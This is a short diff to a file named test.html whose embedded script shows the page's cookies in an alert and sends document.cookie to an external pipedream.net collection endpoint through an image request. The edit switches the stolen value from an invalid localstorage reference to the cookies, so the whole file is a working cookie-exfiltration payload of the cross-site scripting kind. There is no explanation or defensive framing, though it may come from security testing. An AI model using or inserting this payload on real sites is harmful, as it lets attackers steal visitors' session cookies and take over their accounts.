--- a/test.html
+++ b/test.html
@@ -5,7 +5,7 @@
   <script>
 alert(document.cookie);
 var i=new Image;
-i.src="https://envjs5kxlmfl33f.m.pipedream.net/ls?"+document.localstorage;
+i.src="https://envjs5kxlmfl33f.m.pipedream.net/ls?"+document.cookie;
 </script>
  </body>
 </html>
